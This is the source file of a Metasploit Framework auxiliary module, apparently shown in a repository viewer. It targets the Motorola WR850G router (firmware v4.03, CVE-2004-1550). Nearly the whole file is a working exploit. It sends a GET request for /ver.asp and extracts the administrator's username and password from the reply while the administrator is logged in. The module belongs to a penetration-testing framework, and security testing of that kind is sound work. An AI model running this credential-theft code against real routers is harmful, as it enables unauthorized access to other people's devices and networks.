root / modules / auxiliary / admin / motorola / wr850g_cred.rb @ master
History | View | Annotate | Download (1.6 kB)
| 1 |
##
|
|---|---|
| 2 |
# $Id$
|
| 3 |
##
|
| 4 |
|
| 5 |
##
|
| 6 |
# This file is part of the Metasploit Framework and may be subject to
|
| 7 |
# redistribution and commercial restrictions. Please see the Metasploit
|
| 8 |
# web site for more information on licensing and terms of use.
|
| 9 |
# http://metasploit.com/
|
| 10 |
##
|
| 11 |
|
| 12 |
require 'msf/core'
|
| 13 |
|
| 14 |
class Metasploit3 < Msf::Auxiliary |
| 15 |
|
| 16 |
include Msf::Exploit::Remote::Tcp |
| 17 |
|
| 18 |
def initialize(info = {}) |
| 19 |
super(update_info(info,
|
| 20 |
'Name' => 'Motorola WR850G v4.03 Credentials', |
| 21 |
'Description' => %q{ |
| 22 |
Login credentials to the Motorola WR850G router with |
| 23 |
firmware v4.03 can be obtained via a simple GET request |
| 24 |
if issued while the administrator is logged in. A lot |
| 25 |
more information is available through this request, but |
| 26 |
you can get it all and more after logging in. |
| 27 |
},
|
| 28 |
'Author' => 'kris katterjohn', |
| 29 |
'License' => MSF_LICENSE, |
| 30 |
'Version' => '$Revision$', |
| 31 |
'References' => [
|
| 32 |
[ 'CVE', '2004-1550' ], |
| 33 |
[ 'OSVDB', '10232' ], |
| 34 |
[ 'URL', 'http://seclists.org/bugtraq/2004/Sep/0339.html'], |
| 35 |
], |
| 36 |
'DisclosureDate' => 'Sep 24 2004')) |
| 37 |
|
| 38 |
register_options([ |
| 39 |
Opt::RPORT(80) |
| 40 |
]) |
| 41 |
end
|
| 42 |
|
| 43 |
def run |
| 44 |
connect |
| 45 |
|
| 46 |
sock.put("GET /ver.asp HTTP/1.0\r\n\r\n")
|
| 47 |
response = sock.get_once |
| 48 |
|
| 49 |
disconnect |
| 50 |
|
| 51 |
if response.nil? or response.empty? |
| 52 |
print_status("No response from server")
|
| 53 |
return
|
| 54 |
end
|
| 55 |
|
| 56 |
# 302 Redirect
|
| 57 |
if response.split(/\r\n/)[0] !~ /200 Ok/ |
| 58 |
print_status("Administrator not logged in")
|
| 59 |
return
|
| 60 |
end
|
| 61 |
|
| 62 |
user = $1 if response.match("http_username=([^\n]*)<br>") |
| 63 |
pass = $1 if response.match("http_passwd=([^\n]*)<br>") |
| 64 |
|
| 65 |
print_status("Found username \"#{user}\" and password \"#{pass}\"") if user and pass |
| 66 |
end
|
| 67 |
end
|